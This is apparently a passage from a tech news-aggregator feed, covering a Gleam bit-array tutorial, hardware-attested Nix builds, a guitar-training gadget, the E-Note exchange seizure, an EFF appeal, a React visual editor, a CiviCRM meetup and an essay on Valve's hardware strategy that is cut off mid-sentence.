When matching on integers, they are treated by default as unsigned. If you want to match on a signed integer, the signed option can be used, and the number is interpreted using two's complement . The unsigned option also exists for consistency, but like big , it does nothing. Signedness only applies to integers and cannot be used with any other type of segment.

let assert <<x>> = <<-1>>
echo x
// 255

let assert <<x:signed>> = <<255>>
echo x
// -1

JavaScript support

Bit arrays are a feature of Erlang, built in to the BEAM virtual machine. This is what inspired the Gleam feature, and it means we get all this behaviour for free on the Erlang target. But on JavaScript, all features need to be implemented from scratch. While most of the Erlang behaviour already exists, a few features are still lacking. At the time of writing the two missing features are the native option, and pattern matching on UTF codepoints. You can check the tracking issue to see if any progress has been made since.

Example

Now that we know about all the features of bit arrays, we can use them. Here is an example of a basic en/decoder for Minecraft's NBT format, using bit arrays.

First, we define our type to represent the NBT data:

pub type Nbt {
  Byte(Int)
  Short(Int)
  Int(Int)
  Long(Int)
  Float(Float)
  Double(Float)
  ByteArray(List(Int))
  IntArray(List(Int))
  LongArray(List(Int))
  String(String)
  List(List(Nbt))
  Compound(Dict(String, Nbt))
}

Next, we can create a decode function to turn a bit array into NBT:

pub fn decode(bits: BitArray) -> Nbt {
  // The first byte tells us what kind of data the value is
  case bits {
    <<1, byte:8-signed, _:bits>> -> Byte(byte)
    <<2, short:16-signed, _:bits>> -> Short(short)
    <<3, int:32-signed, _:bits>> -> Int(int)
    <<4, long:64-signed, _:bits>> -> Long(long)
    <<5, float:32-float, _:bits>> -> Float(float)
    <<6, double:64-float, _:bits>> -> Double(double)

    <<8, length:32, bytes:bytes-size(length), _:bits>> -> {
      // We can't match on arbitrary UTF-8 so we must extract the bytes then
      // convert it to a string.
      let assert Ok(string) = bit_array.to_string(bytes)
      String(string)
    }

    <<7, length:32-signed, bytes:bytes-size(length), _:bits>> ->
      ByteArray(bytes_to_list(bytes, 8, []))

    <<11, length:32-signed, bytes:bytes-size(length * 4), _:bits>> ->
      IntArray(bytes_to_list(bytes, 32, []))

    <<12, length:32-signed, bytes:bytes-size(length * 8), _:bits>> ->
      LongArray(bytes_to_list(bytes, 64, []))

    // Omitted for brevity
    <<9, _:bits>> -> todo
    <<10, _:bits>> -> todo
    // For the sake of this example, we will just crash the program here
    _ -> panic as "Invalid NBT"
  }
}

The bytes_to_list splits a bit array into n-bit chunks:

fn bytes_to_list(bytes: BitArray, chunk_size: Int, out: List(Int)) -> List(Int) {
  case bytes {
    <<first:size(chunk_size)-signed, rest:bytes>> ->
      bytes_to_list(rest, chunk_size, [first, ..out])
    _ -> list.reverse(out)
  }
}

Finally, an encode function to turn the NBT back into binary:

pub fn encode(nbt: Nbt) -> BitArray {
  case nbt {
    Byte(byte) -> <<1, byte:8>>
    Short(short) -> <<2, short:16>>
    Int(int) -> <<3, int:32>>
    Long(long) -> <<4, long:64>>
    Float(float) -> <<5, float:float-32>>
    Double(double) -> <<6, double:float-64>>

    // Append the tag (7), followed by each byte in the list
    ByteArray(bytes) ->
      list.fold(bytes, <<7>>, fn(out, byte) { <<out:bits, byte:8>> })
    IntArray(ints) ->
      list.fold(ints, <<11>>, fn(out, int) { <<out:bits, int:32>> })
    LongArray(longs) ->
      list.fold(longs, <<12>>, fn(out, long) { <<out:bits, long:64>> })

    String(string) -> <<8, string:utf8>>

    // Omitted for brevity
    List(_) -> todo
    Compound(_) -> todo
  }
}

Hardware-Attested Nix Builds

Lobsters

garnix.io

2025-12-18 16:31:33

Comments...

Original Article

More confidence in the integrity of your Nix artifacts.

We have recently run what might be the first hardware-attested Nix build. Hardware attestation provides cryptographic, independently verifiable evidence that a Nix build was executed as specified. It dramatically reduces the attack surface for integrity attacks on Nix builds, to the point that even full root access to e.g. garnix or cloud provider infrastructure is not alone enough to forge attestations . ?

In other words, this is a big deal!

What this all means and how we did it is the subject of this blog post. In a following post, we'll also talk about how attestation enables us to have confidential Nix builds.

An attestation is a claim about the state of a software system (sometimes called the target ) in the form of evidence for that claim. The process of collecting evidence through observation is called a measurement , and usually this takes the form of hashes of some system state. The process of verifying or assessing the evidence is called verification .

A couple of examples will make this more concrete. GitHub (as well as other CIs) allows workflows access to an OIDC token that identifies the bearer as a particular CI run, for a particular commit in a particular repo. The measurement is the hashing of workflow files, looking up of commits, etc. An external service (e.g. Sigstore) can then generate a signing certificate for any bearer of such a token, and the signing certificate will contain the identity (run/commit/repo) signed by the service. The CI run can now sign a statement saying "this build artifact was produced by such-and-such run/commit/repo", which is the attestation. If you trust that GitHub and the external service did their job correctly and haven't been hacked, and that the CI runner wasn't hacked, you have very good reason to believe that statement. The signature is evidence that the services agree with that statement.

There's a lot this attestation doesn't specify: What is the hypervisor, what other software is running in the host, what version of the kernel is running in the guest, etc. And it may be that other things, such as exactly what versions dependencies were downloaded during builds, is not captured in e.g. lockfiles. And all of this is relevant. It would be good to have that information also attested. But even better is if that information were not relevant because it cannot influence the artifact.

Another even more pertinent example is the signatures associated with Nix store paths. The assertion in this case is that a particular output was the result of building a particular input (derivation) , and the measurement is the hash of the contents of the output. Whether you believe that assertion may well depend on who is making it (i.e. who signed it). Nix takes care of locking all resolved dependencies, but all the other facts about the build are still relevant, and still missing.

The conclusion we want to be able to draw from the evidence we have in attestations is that our built artifact is correct. What "correct" means, comes down to the semantics of your programming language. If your interpreter/compiler implement that semantics correctly, and the OS implements its semantics correctly, and nothing else gets in the way, it will be correct. But a lot can get in the way — that's how the attacks get in.

Hardware that supports attestation helps limit those things, and to then make dependable claims about everything else. In particular, the hardware supports creating isolated virtualized environments that aren't as easily influenced by their host (these are called Trusted Execution Environments, or TEE). ? If you create a tiny microvm with barely anything besides a kernel and your program, and it can't be influenced by the host, and you can attest that reliably, without the stuff backing the attestation introducing even more things to be attested, attestation becomes very convincing evidence of the correctness and integrity of your artifacts.

The way hardware manufacturers achieve this is by enabling software to initialize hardware-backed isolation of memory (and of CPUs and registers), combined with hardware-backed measurements of the contents of that memory, which are then signed by a key with hardware-backed assurances that it will not be leaked or used inappropriately. Moreover, even tampering with the system physically is made very difficult. The host process can then load a program into memory, and request that the hardware initialize this isolation and measurement process and begin executing the instruction loaded into memory.

When the program executes, it can then request that data about the memory measurements be signed together with arbitrary data. A verifier can check that the memory measurements correspond to the correct program either by compiling the program again (if the build is reproducible) or by having been the one to compile it in the first place. This report is thus an attestation that that program created that data. The semantics of the data is clear from the program itself; for example, if a program that builds an artifact and then requests that the hash of that artifact be attested, the attestation shows that that artifact was built by the program. ?

Attestations don't need to be about artifacts (unless by "artifact" we mean something very general like "anything a program produces", including HTTP requests, stdout lines, etc.). An important class of attestations are of this kind. Instead, attestation is used to prove that a system you are communicating with is running some specific software. A big driver for developing hardware attestation was so cloud providers could convincingly prove to their clients that they were running the software they had been asked to. ? . This type of attestation is sometimes called remote attestation and distinguished from artifact-based software attestation . (The terms are terrible.)

Nix already does an excellent job at capturing the explicit build inputs of an artifact, and limiting network access. Hardware attestation can make this much more dependable by limiting the influence of everything else.

One way we could do hardware-attested Nix builds it to simply start a remote builder in a hardware-attested VM, and then use the hash of the tuple (input hash, output hash) as the extra data given to the hardware attestation. This is better than existing remote builders, and is quite easy to implement (it's the first thing we did). But there is still a lot that can go wrong: one build might escape its sandbox, and then influence the other. Or the Nix daemon itself can be exploited.

Much better is to replace the sandbox that Nix builds run in with a hardware-attested, very minimal VM. In the sandbox, hardly anything is needed besides the builder script of the derivation itself, and its dependencies. In fact, you don't need Nix, and, for the most part, you don't even need network access (the exception are fixed-output derivations). We can then attest the tuple (input derivation, Merkle-tree hash of dependencies, output hash) together with the VM boot measurements. (Note that we don't in the VM verify the attestation reports of the dependencies, leaving that to the end user, since that allows for varying trust policies — important if, for example, some system is compromised.)

This is an incredibly powerful thing. If hardware-attestation lived to its full promise, the attestation report would be completely trustworthy proof that the right thing was built given the VM (e.g., the Linux kernel, bootloader and firmware versions) and trust in hardware manufacturers manufacturing process and key management. ? Anyone could accept this proof and be safe. (We also have a simple patch to Nix to make signature verification of substitution more configurable, so that Nix itself could start accepting such evidence, and requiring hardware-attested builds in your server or machine be made trivial. Upvote the issue !)

Of course, that's too good to be true. There have been attacks on such hardware, and some are still exploitable. In fact, it is generally a bad idea to think of hardware protections as absolute, and to instead see them as deterrents much in the same way that you would likely think of a bank vault — and, like a bank vault, to consider whether the cost of the attack is lower than the benefit. Significantly, the extant attacks rely of having physical access to the machine . This is a dramatically different threat model to software attacks — it's much harder in most cases to gain physical access to a machine, and much more likely to result in being caught. If you are using a cloud provider and your worry is nation-state threat actors, or deliberately the cloud provider itself, however, you should certainly be worried about this. You can, of course, combine hardware attestation with on-prem servers (and a couple of cameras to watch over them). Despite the fact that remote attestation is usually described as securing yourself against your cloud providers, I think it makes a lot of sense with servers you manage yourself.

Because hardware attacks are possible, one should not trust any build with the correct measurements, signed by hardware keys from Intel or AMD. Having physical access to a computer can, with certain attacks , allow one to sign spurious measurements, so an attacker would only need physical access to one such computer. Instead, you should only accept signatures from machines in physical control of entities you trust.

Because attestation reports contain information about so much that can influence a build, they also make it easy to assess the impacts of compromises and to effectively recover from them. If a particular version of Linux or the firmware is the problem, or if a particular machine was physically accessed, you know exactly what builds they were responsible for.

There's of course a lot about attestation that we didn't cover or simplified substantially. For hardware, details vary considerably between manufacturers, and between generations; it's useful to pick one manufacturer and learn more about it.

Hardware attestation can be combined with independent rebuilds to increase confidence even more in the result. In particular, rebuilding every derivation twice, in different cloud providers (or once on-prem), and on AMD and Intel, is probably a very good idea, reducing the impact of both manufacturer-specific attacks and of cloud provider compromises.

One thing I didn't talk about is how evidence can be chained to support broader conclusions. For example, one could run an attested Nix evaluator that gives you as output only the drv file corresponding to a particular Nix file (or output of the flake file). This can be combined with attestations about builds to attest file-to-build-output mappings. These combinations can become complex; frameworks such as in-toto can help.

In the next blog post, we'll talk about how we can have a similarly high level of assurance that no program besides the intended one can read the inputs or outputs of a build — how we can have, in short, confidential builds.

There are some issues with per-build sandboxes that we still have to work out (for instance, that they take a long time to start up), and setting this system up still requires a lot of involvement on our part and consideration of the specific use. Additionally, it's more expensive and slower than non-attested builds. So we don't expect to enable these for all customers in the near future. But if you think your company might benefit from this, do reach out. A big benefit of this approach is that using the attestations once someone has set up the build pipeline is remarkably simple.

Tuitar – A portable guitar training tool and DIY kit

Lobsters

github.com

2025-12-18 16:18:48

Comments...

Original Article

Learning how to play guitar with a TUI - hence "Tuitar".

Tuitar is a terminal-based guitar training tool that runs standalone on ESP32 hardware.
Available as a DIY kit, see the firmware and hardware sections for more details.
Click here to jump to the features ➡️

Note

Tuitar is currently in prototype stage but you can still try it out and contribute to the project.

The plan is to feature it on CrowdSupply once the firmware and hardware are stable. Let me know if you are interested in supporting the project or have any feedback !

All of this is built on livestream as a part of a series called Becoming a Musician (100+ hours of content!)

Follow @tuitardev on X (Twitter) to not miss any updates!

Table of Contents

Promo Video
Launch & Live Demo
Try it out!
Features
UI
- Input modes
- FPS
Controls
Old Demos
License & Contributions
Copyright

Promo Video

▶️ https://www.youtube.com/watch?v=tZm7cLaHAR0

Launch & Live Demo

Tuitar was presented for the first time at Rust Forge Conference in New Zealand.

▶️ https://www.youtube.com/watch?v=es48dmNWMVQ&t=29905s

Try it out!

Tuitar was originally designed to run in the terminal.

So you can install the binary here:

cargo install tuitar --locked

And run it with:

If you want the full experience, you can also build the kit , which looks like this:

Features

Tuning

Tuitar offers real-time visualizations from an input source which can be used for tuning your guitar or other instruments.

The frequency graph above shows the detected frequency of the input sound. When a fundamental frequency is detected, the closest musical note is being displayed with the respective cents with a bar at the top.

Also, the dots next to the displayed note indicate the distance to the perfect note in cents (left/red for flat, right/green for sharp).

When the displayed note is green and the bar is centered, it means that the input sound is perfectly in tune with that note.

Fretboard Tracking

Tuitar can track the notes you play on your guitar in real-time and display them on a virtual fretboard.

The default ( live ) mode shows the currently pressed strings and frets:

One fun thing you can do is to switch to random mode which is a small game where you get points by playing the correct notes shown on the screen. There is a timer and a score counter at the top.

The song mode is also available which shows the notes of a pre-loaded song. It's useful for learning riffs, solos or any melody.

Note

You can load a song onto the device by placing the MIDI file ( .mid) or Guitar Pro file ( .gp3, _.gp4, _.gp5) into the tuitar-core/songs directory and re-flashing the firmware . This will be made more user-friendly in the future.

The scale mode also helps with learning scales.

The available scales are:

Major and Minor
Pentatonic (Major and Minor)
Blues
Mixolydian
Dorian
Lydian

You can also press the mode and menu buttons to toggle the root note. (See controls for more information.)

In every fretboard mode, turning the control knob will change the focused region of the fretboard. This is useful for practicing scales or riffs in different positions. Unison is also supported, so you can play the same note on different strings and it will be highlighted on the fretboard.

Signal Analysis

If you need additional information about the input signal, you can use the waveform and spectrum graphs.

Waveform

Shows the raw audio signal over time. You can change the focused region in the chart by turning the knob. It is especially useful for debugging the input since the y-axis is simply shows a voltage from 0 to 3.3V.

Click to see the demo

Spectrum

Shows the frequency spectrum of the input signal. Especially useful for dB measurements and debugging the input. The x-axis is frequency in Hz while the y-axis is the amplitude in dB.

Click to see the demo

UI

Input modes

Tuitar currently supports 2 input modes:

Microphone input
Jack input (6.35mm)

Press the mode button to switch between the input modes. The current mode is displayed at the left bottom corner of the screen. ( [M] or [J] )

FPS

The current FPS is being shown on the right bottom corner of the screen.

Controls

Tuitar has a simple control scheme with 2 buttons and 2 knobs . The controls are context-sensitive, meaning they change their function based on the current tab.

Global

Control	Action	Function
Gain knob	Turn	Adjust input gain (jack sensitivity)

Fretboard

Control	Action	Function
Mode button	Short press	Switch fretboard mode (Live ↔ Random ↔ Scales ↔ Song)
Mode button	Long press	Switch input mode (Mic ↔ Jack)
Menu button	Short press	Go to the next tab
Menu button	Long press	Change scale
Mode + Menu	Short press	Toggle root note or song
Ctrl knob	Turn	Scroll fretboard

Frequency/Spectrum/Waveform

Control	Action	Function
Mode button	Short press	Switch input mode (Mic ↔ Jack)
Menu button	Short press	Go to the next tab
Ctrl knob	Turn	Scroll frequency chart

It only supports pitch detection and fretboard tracking for now, but you can use it to practice your guitar skills without the hardware.

Old Demos

Here are some demos from the development phase.

Tuitar running on ESP32 T-Display:

tuitar-demo.mp4

With jack input:

tuitar-demo2.mp4

License & Contributions

This project can be used under the terms of the Apache-2.0 or MIT licenses. Contributions to this project, unless noted otherwise, are automatically licensed under the terms of both of those licenses.

🦀 ノ( º _ º ノ) - respect crables!

Feel free to open issues or PRs for improvements, bug fixes, or ideas!

Copyright

US seizes E-Note crypto exchange for laundering ransomware payments

Bleeping Computer

www.bleepingcomputer.com

2025-12-18 16:13:03

Law enforcement has seized the servers and domains of the E-Note cryptocurrency exchange, allegedly used by cybercriminal groups to launder more than $70 million. [...]...

Original Article

US seizes E-Note crypto exchange for laundering ransomware payments

Law enforcement has seized the servers and domains of the E-Note cryptocurrency exchange, allegedly used by cybercriminal groups to launder more than $70 million.

It is believed that the funds originated from ransomware and account takeover attacks, and were subsequently funneled through an international network of “money mules.”

“Since 2017, the FBI identified more than $70,000,000 of illicit proceeds of ransomware attacks and account takeovers transferred via E-Note payment service and money mule network, including laundered funds stolen or extorted from U.S. victims,” reads the Department of Justice announcement .

International partners (the Finnish National Bureau of Investigation and the German Police), along with the U.S. Department of Justice, the Michigan State police, and the Federal Bureau of Investigation, confiscated the domains e-note.com , e-note.ws , and jabb.mn , and took down the mobile apps associated with them.

**Seizure notice on E-Note's main domain**
*Source: BleepingComputer*

Law enforcement agents also seized servers hosting the platform and its mobile applications, as well as copies of customer databases and transaction records.

It is important to note that operators of some illegal services build mobile apps as an alternative communication channel between customers and vendors. The purpose is to offer increased privacy and hinder law enforcement tracking.

The U.S. Attorney’s Office has unsealed an indictment against Mykhalio Petrovich Chudnovets, 39, a Russian national believed to be the operator of E-Note, charging him with one count of money laundering conspiracy.

Chudnovets began offering money-laundering services to cybercriminals in 2010, facilitating the transfer of funds across countries and converting cryptocurrency proceeds into fiat currency.

No arrests have been made, but Chudnovets now faces 20 years in prison.

The seizure of client database and transaction details may lead to the identification of more cybercriminals and users of the E-Note service, and may help law enforcement with future actions.

Break down IAM silos like Bitpanda, KnowBe4, and PathAI

Broken IAM isn't just an IT problem - the impact ripples across your whole business.

This practical guide covers why traditional IAM practices fail to keep up with modern demands, examples of what "good" IAM looks like, and a simple checklist for building a scalable strategy.

Stand Together to Protect Democracy

Electronic Frontier Foundation

www.eff.org

2025-12-18 16:12:30

What a year it’s been. We’ve seen technology unfortunately misused to supercharge the threats facing democracy: dystopian surveillance, attacks on encryption, and government censorship. These aren’t abstract dangers. They’re happening now, to real people, in real time. EFF’s lawyers, technologists, ...

Original Article

What a year it’s been. We’ve seen technology unfortunately misused to supercharge the threats facing democracy: dystopian surveillance, attacks on encryption, and government censorship. These aren’t abstract dangers. They’re happening now, to real people, in real time.

EFF’s lawyers, technologists, and activists are pushing back. But we need you in this fight.

JOIN EFF TODAY!

MAKE A YEAR END DONATION—HELP EFF UNLOCK CHALLENGE GRANTS!

If you donate to EFF before the end of 2025 , you’ll help fuel the legal battles that defend encryption, the tools that protect privacy, and the advocacy that stops dangerous laws—and you’ll help unlock up to $26,200 in challenge grants.

📣 Stand Together: That's How We Win 📣

The past year confirmed how urgently we need technologies that protect us, not surveil us. EFF has been in the fight every step of the way, thanks to support from people like you.

Get free gear when you join EFF!

This year alone EFF:

Launched a resource hub to help users understand and fight back against age verification laws .
Challenged San Jose's unconstitutional license plate reader database in court.
Sued demanding answers when ICE spotting apps were mysteriously taken offline.
Launched Rayhunter to detect cell site simulators .
Pushed back hard against the EU's Chat Proposal that would break encryption for millions .

After 35 years of defending digital freedoms, we know what's at stake: we must protect your ability to speak freely, organize safely, and use technology without surveillance.

We have opportunities to win these fights, and you make each victory possible. Donate to EFF by December 31 and help us unlock additional grants this year!

Already an EFF Member? Help Us Spread the Word!

EFF Members have carried the movement for privacy and free expression for decades. You can help move the mission even further! Here’s some sample language that you can share with your networks:

We need to stand together and ensure technology works for us, not against us. Donate any amount to EFF by Dec 31, and you'll help unlock challenge grants! https://eff.org/yec
Bluesky | Facebook | LinkedIn | Mastodon
(more at eff.org/social )

_________________

EFF is a member-supported U.S. 501(c)(3) organization. We’re celebrating TWELVE YEARS of top ratings from the nonprofit watchdog Charity Navigator! Your donation is tax-deductible as allowed by law.

Show HN: Composify – Open-Source Visual Editor / Server-Driven UI for React

Hacker News

github.com

2025-12-18 16:02:29

Comments...

Original Article

Introduction

Composify is an open-source library that adds a visual editor to your React application. It lets non-developers build pages using your existing production components, so engineers can focus on actual feature work.

Most visual builders force you into a binary choice: use a rigid page builder with generic components (Wix, Squarespace) or adopt a complex headless CMS that requires modifying your code to fit their platform (Builder.io, Puck, Storyblok).

Composify sits in the middle. It is a visual interface for your actual component code. Register your components once, and anyone on your team can use them to build pages visually. Your design system stays intact. Marketing and content teams compose pages without filing tickets.

It's just a React library. Works with Next.js, Remix, or any React environment. You own your data.

Check out the live demo to see it in action.

Getting Started

Installation

# npm
$ npm install @composify/react --save

# pnpm
$ pnpm add @composify/react

# yarn
$ yarn add @composify/react

Register Your Components

Before you can use a component in the Editor or Renderer , you need to register it in the Catalog .

// catalog.tsx
import { Catalog } from '@composify/react/renderer';

const Text = ({ textAlign, children }) => (
  <p style={{ textAlign }}>{children}</p>
);

Catalog.register('Text', {
  component: Text,
  props: {
    textAlign: {
      label: 'Text Align',
      type: 'radio',
      options: [
        { label: 'Left', value: 'left' },
        { label: 'Center', value: 'center' },
        { label: 'Right', value: 'right' },
      ],
      default: 'left',
    },
    children: {
      label: 'Text',
      type: 'string',
      default: 'Hello, world!',
    },
  },
});

Important : Import this catalog file at your app's entry point (like index.tsx or _app.tsx ) so the registration happens before the app renders.

Render Your Components

Once registered, you can render JSX from a string using the Renderer component:

// page.tsx
import { Renderer } from '@composify/react/renderer';

const source = `
  <div>
    <h1>Welcome to Composify!</h1>
    <Text textAlign="center">This is a simple example.</Text>
  </div>
`;

export const Page = () => (
  <Renderer source={source} />
);

Edit Visually

To let users edit the content, use the Editor component:

// editor.tsx
import { Editor } from '@composify/react/editor';
import '@composify/react/style.css';

const source = `
  <div>
    <h1>Welcome to Composify!</h1>
    <Text textAlign="center">This is a simple example.</Text>
  </div>
`;

export const Page = () => (
  <Editor title="My Page" source={source} onSubmit={console.log} />
);

Users can drag and drop components, modify props via the sidebar, and nest elements. Upon save, the editor serializes the tree back into a clean JSX string.

Why Composify?

We built Composify to solve a common problem. Engineers build component libraries, but only engineers can use them effectively.

Ship UI changes without deployments

Most apps ship with a hard-coded UI. Even small tweaks require a full redeploy. With Composify, your UI lives on the server. Change it there, and it's live everywhere, instantly. No CI/CD, no app store reviews, no waiting.

Big tech does this already. Airbnb has Ghost Platform . Yelp built CHAOS . Lyft and Shopify have their own SDUI systems. Composify gives you that same power without the in-house infrastructure.

Unblock your team

In most companies, small UI tweaks end up in the engineering backlog. Marketing wants to launch a promo. Content editors want to tweak a landing page. The ops team is running a seasonal campaign.

With Composify, the roles become clear:

Engineers focus on what they do best: building robust, reusable components
Non-developers use the visual editor to bring those components to life

A/B testing and rapid prototyping

Want to test a different page layout for a user segment? Or prototype a feature directly in production? Swap out page structures, personalize onboarding flows, test new CTAs. It all happens server-side. No redeploys. No branching strategies.

Better than headless CMS

Traditional CMSs lock you into themes and templates. You end up rebuilding your design system inside a clunky page builder, and the result never quite matches your actual app.

With Composify, content teams use the same components that power your core product. What they edit is exactly what ships.

More details on use cases in the documentation .

Composify Cloud

The open-source library gives you the engine (Editor and Renderer). Building the car (database, API, version history, collaboration) takes time.

Composify Cloud is the infrastructure layer for teams that want the benefits without maintaining the backend:

Managed hosting - No infrastructure to manage, unlimited bandwidth
Real-time collaboration - Multiple team members can edit the same page simultaneously
Version history - Time-travel through changes and restore previous versions

Documentation

Full documentation is available at composify.js.org/docs .

Contributing

We welcome contributions. Whether you're fixing bugs, adding features, or improving docs, pull requests and issues are always welcome.

License

This project is licensed under the Elastic License 2.0 . Free to use for most cases, with some restrictions on offering Composify as a hosted service. See the license file for details.

🎄 A Festive CiviCRM Catch-Up in Birmingham

CiviCRM

civicrm.org

2025-12-16 15:48:53

🎄 A Festive CiviCRM Catch-Up in Birmingham As the year drew to a close, we were delighted to bring the UK CiviCRM community together for a festive meetup in Birmingham on 9 December. The meetup began in the best possible way, with dinner at a lovely local restaurant, giving everyone a relaxed ...

Original Article

🎄 A Festive CiviCRM Catch-Up in Birmingham

As the year drew to a close, we were delighted to bring the UK CiviCRM community together for a festive meetup in Birmingham on 9 December .

The meetup began in the best possible way, with dinner at a lovely local restaurant , giving everyone a relaxed opportunity to catch up, share experiences from the year, and enjoy some seasonal cheer. 🍽️✨

The following day, conversations continued with an open and wide-ranging discussion about the CiviCRM world — from current challenges and successes to ideas for strengthening and supporting the UK community.

Looking ahead, there was plenty of enthusiasm for future activities and events , including:

A potential UK CiviCRM meetup in Manchester in late February 2026
The idea of a one-day, user-focused CiviCamp , possibly hosted in Birmingham or London in May 2026
More administration-focused training sessions , responding to ongoing demand from users
And a potential end-of-year mini sprint , giving the community a chance to collaborate on practical improvements and shared goals

It’s encouraging to see so much energy and willingness to get involved as we look ahead to the coming year.

👉 For updates and further information, please keep an eye on the Mattermost site , under the UK Meetups channel .

Wishing everyone in the CiviCRM community a very Merry Christmas and a Happy New Year — we look forward to seeing you again soon!

Valve Is Running Apple's Playbook in Reverse

Hacker News

www.garbagecollected.dev

2025-12-18 15:45:42

Comments...

Original Article

(Apple and Steam logos side by side) — (Image generated with Gemini Nano Banana Pro)

In November 2025, Valve “unveiled” the Steam Machine – a living room PC designed to bring your Steam library to the TV. Gaming press covered it as news, but what was missing from the headlines was that this is actually Steam Machine 2.0 . Valve already tried this a decade ago, and it flopped.

So why try again?

Because Valve learned from that failure. They learned what Apple had figured out years earlier – hardware, software, and services need to, to quote Jobs, “ just work ” (2011 WWDC).

This isn’t speculation. Take it from Valve co-founder Gabe Newell’s own thoughts on threats to PC gaming:

The threat right now is that Apple has gained a huge amount of market share, and has a relatively obvious pathway towards entering the living room with their platform [...] I think Apple rolls the console guys really easily. The question is can we make enough progress in the PC space to establish ourselves there, and also figure out better ways of addressing mobile before Apple takes over the living room?

(Talk at University of Texas’s LBJ School of Public Affairs, via Polygon in 2013 )

Newell wasn’t worried about Nintendo, PlayStation, or Xbox; he was worried about Apple, who weren’t even in gaming then (and still aren’t today).

His solution? Run Apple’s playbook, but do it in reverse.

To understand what Valve is doing, it helps to see the paths both companies took, and how they mirror each other.

Apple’s path to becoming the modern corporate juggernaut that nobody saw coming even 20 years ago needs little introduction: Macs, to portable Macbooks, to portable music (iPods), to iPhones, to App Store, to Everything Else, each step further locking customers into the ecosystem through hardware that “just works”.

Valve was founded by ex-Microsoft employees Gabe Newell and Mike Harrington in the late 90s following their frustration that, among other things, Microsoft was getting outflanked in gaming by startups with a better understanding of how to use the internet . As you might expect from a company with that origin, they started by making video games like Half-Life, Team Fortress, and Counter-Strike.

Steam came in 2003, created for easy management of updates for their games over the Internet (what today would be called a “proprietary launcher”). What Valve soon realized, though, is that they could turn this “cost” into a source of revenue by making their solutions available to other developers, and so came the Steam Store and services (2005). Over time, they built on this, adding features like Managed Matchmaking and Cloud Saves before they took their first crack at hardware in 2015 with Steam Machine 1.0 (aka the Steam Box).

The Steam Box… didn’t do so hot. We’ll get to that.

After that, the important points in the timeline to note for this narrative are the release of the Steam Deck (a portable PC gaming device, perhaps most analogous in function to the Nintendo Switch) in 2022, and the instigator for today, the announcement of the Steam Machine (2.0) for 2026.

For a snapshot of how Steam stands today:

Regularly peaks at ~41MM concurrent users on weekends: https://store.steampowered.com/stats/stats/
- Note: that’s concurrent users, not distinct users over the course of the weekend. As a global platform, it’s absolutely the case that distinct user count in a 24 hour time period is higher than that.
While we don’t have any official recent Monthly Active User (MAU) numbers, Valve gave a figure of about 132 MM at the end of 2021 .
- If we scale that using the ratio of peak concurrent users then vs now, that gives an estimate of ~200MM MAU (though this is very rough)
- A couple of contextual comparisons:
  - Netflix has ~300 million subscribers , about 100 million of whom are on the ad-supported tier .
  - Uber reported ~190 million MAPC (Monthly Active Platform Consumers, i.e. “people who took a ride or bought Uber Eats delivery”) for the most recent quarter .
  - eBay has ~ 135 million “Active Buyers” (defined as an account that made a purchase in the last year ).

Many may be surprised to learn that the Steam Machine being released in 2026 is actually Steam Machine 2.0. Valve, for its part, seems to be tacitly trying to memory-hole the earlier model; essentially none of the messaging about the new release brings up the fiasco from a decade prior. However, it’s clear that Valve has internalized a lot of the failures from that affair:

It’s a perceived truism in the games industry that platform exclusives drive platform adoption. While I think this is on the whole significantly overstated, and it seems like the industry itself might be coming around on that, it’s hard to deny that the fact that many major games just didn’t run on the original Steam Machine’s software could hardly be called a selling point:

Probably the biggest issue holding back the Steam Machine at launch was the [...] fact they only run games that have Linux versions. Three of the platform’s biggest titles in recent years: The Witcher 3, Grand Theft Auto 5, and Metal Gear Solid V, still aren’t supported, which is a big problem for a machine aimed at gamers.

( The Steam Machine: What Went Wrong | TechSpot , 2017)

Even looking at the games that were supported, they performed worse on SteamOS than they did on Windows … which ties into the next point:

Steam Link, launched in 2015 , allowed owners of (sufficiently powerful) PCs to stream games to the TV over your (hopefully uncluttered) WiFi network at a lower price point.

What did that mean? You had two options:

Purchase a new machine that cost anywhere from $500 to thousands and hook it up to your TV; or
Purchase a little stick for $50 and use the PC you probably already gamed on before all this as a local server for your games. You know, that PC running Windows, which apparently runs those games better anyway.

Gosh, I wonder which one consumers would want? /s

For this one, I’m just going to quote directly from another publication that ran a postmortem article on all this about a decade ago:

“We started thinking, ‘Hey, you know, we’re actually creating a middle-tier niche for this at this point,’” says [Michael Hoang, marketing manager @ iBuyPower]. “You have your console, you have your PC gamers, we’re right in between. We’re right in the middle where no one can really claim which one this is. So now we’re creating a new demographic that has never been created, so we have to do everything from the ground up at this point. And it was very, very hard to convince people, well, do I want to be a PC gamer? Do I want to stick with just being console? Or this new thing in the middle.

( What happened to Steam Machines? | PC Gamer , originally published 2017, re-published 2018)

How does this compare to the situation in 2022 (with the Steam Deck) or 2026 (Machine 2.0)?

On the back of years of testing/improvements and launch of the Steam Deck, the Proton gaming compatibility layer for Linux means even some brand new games can, out of the box, often “just work” on SteamOS without tuning. ProtonDB tracks compatibility , and counts 7000+ games that are verified to work as well or almost as well as on Windows, and when sorting games by popularity on Steam (i.e. the main platform), you have to pass more than 40 at time of writing before you get one that isn’t at least “Gold” rated.

While the software still technically exists and is usable, the hardware is dead , and even the software has “better” open source alternatives that are recommended by the community as the go-to solutions (ref: Moonlight/Sunshine ).

This one is less clear; while (at time of writing) the pricing of Steam Machine 2.0 is not confirmed, it has been stated that it won’t be sold at a loss despite only having the hardware to be performance-competitive with current-gen consoles (which are sold at a loss, and so would be expected to be cheaper). At a glance, it seems like Valve is setting themselves up for the same “are we PC gamers, console gamers, or something in the middle” question all over again.

However, there’s an argument to be made that, if the Steam Deck is the iPhone of gaming, then the Steam Machine is the iPad – an interoperable, friction-free extension of the software to a new form factor, built to fulfill a complementary purpose to the Deck. Moreover, “a slightly more expensive console” is an easier sell when you can also play your games on the go with the Steam Deck, in that (again) it centralizes your library.

Returning to the earlier-mentioned PC Gamer post-mortem:

What’s the best thing to come of iBuyPower’s SBX? The LED strip, says Hoang, which looked really nice.

Now, taking a look at the Steam Machine store page:

Jokes aside, I think Valve’s biggest takeaways from the debacle that was “Steam Machine 1.0” was that, for their vision of hardware to make sense as a customer purchase, it need to be smooth; they couldn’t just ship an MVP and build on it later, or rely on third-party partners specialized in hardware to build the rig while they made the software and hope that the two would meet in the middle. No, they needed to control the hardware, the software, the interface, the messaging, everything.

They learned that it all needed to “ just work, seamlessly ”.

The parallels aren’t only in their trajectories and ultimate product offerings, though. A deeper examination of what makes these companies unique and valuable reveals more similarities, which is perhaps unsurprising considering that they are both also very, very successful.

Both Jobs and Newell view(ed) digital asset piracy as a problem of availability and convenience.

Jobs:

